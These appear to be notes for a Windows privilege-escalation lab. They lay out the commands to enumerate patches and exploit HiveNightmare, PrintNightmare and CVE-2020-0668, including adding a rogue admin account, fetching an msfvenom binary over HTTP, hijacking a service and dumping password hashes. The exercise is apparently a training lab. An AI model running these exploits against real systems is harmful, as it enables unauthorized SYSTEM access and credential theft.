kernel-exploit

Enumeration Commands

systeminfo
wmic qfe list brief
Get-Hotfix
icacls
whoami /priv
ls \\localhost\pipe\spoolss

Exploitation Commands

HiveNightmare.exe

impacket-secretsdump

Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\CVE-2021-1675.ps1

Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

msfvenom

python3 -m http.server <port>

wget http://<ip>:<port>/<file>

CVE-2020-0668.exe <source> <destination>

copy /Y <source> <destination>

msfconsole -r <resource_file>

net start MozillaMaintenance

Verification Commands

net user hacker

getuid # (Meterpreter)

hashdump # (Meterpreter)

Key Concepts:

• Kernel Exploits: - Exploit vulnerabilities in the Windows kernel for privilege escalation. - Patching is crucial, but often incomplete.

• Historical Vulnerabilities: - MS08-067 (Server service RCE). - MS17-010 (EternalBlue, SMB RCE). - ALPC Task Scheduler 0-Day (Local privilege escalation). - CVE-2021-36934 (HiveNightmare, registry access). - CVE-2021-1675/CVE-2021-34527 (PrintNightmare, print spooler RCE). - CVE-2020-0668 (Service Tracing local privilege escalation).

• Patch Management: - Importance of keeping systems updated. - Older vulnerabilities remain relevant. Approach, Commands, Tools, and Techniques:

1. Enumeration: - systeminfo, wmic qfe list brief, Get-Hotfix (Installed updates). - icacls (File permissions). - whoami /priv (User privileges). - ls \\localhost\pipe\spoolss (Spooler service check).

2. Exploitation: - HiveNightmare (CVE-2021-36934): - HiveNightmare.exe (Dump registry hives). - impacket-secretsdump (Extract hashes). - PrintNightmare (CVE-2021-1675/CVE-2021-34527): - Set-ExecutionPolicy Bypass -Scope Process (Bypass PowerShell execution policy). - Import-Module .\CVE-2021-1675.ps1 (Import PowerShell exploit). - Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" (Add local admin). - CVE-2020-0668 (Service Tracing): - Build exploit in Visual Studio. - msfvenom (Generate malicious binary). - Python HTTP server, wget (Download binary). - CVE-2020-0668.exe (Run exploit). - copy (Replace service binary). - Metasploit resource script, msfconsole -r (Start listener). - net start MozillaMaintenance (Start service).

3. Verification: - net user hacker (Verify user creation). - getuid (Meterpreter, verify SYSTEM privileges). - hashdump (Meterpreter, dump password hashes).

Commands:

• systeminfo, wmic qfe list brief, Get-Hotfix, icacls, whoami /priv, ls, Set-ExecutionPolicy, Import-Module, Invoke-Nightmare, msfvenom, python3 -m http.server, wget, copy, msfconsole, net user, net start, getuid, hashdump, impacket-secretsdump.

Tools:

• HiveNightmare.exe, impacket, Metasploit, PowerShell scripts, custom exploits. Task:

• RDP to the target.

• Exploit HiveNightmare, PrintNightmare, and CVE-2020-0668.

• Escalate privileges to NT AUTHORITY\SYSTEM.

• Retrieve the flag from the Administrator Desktop.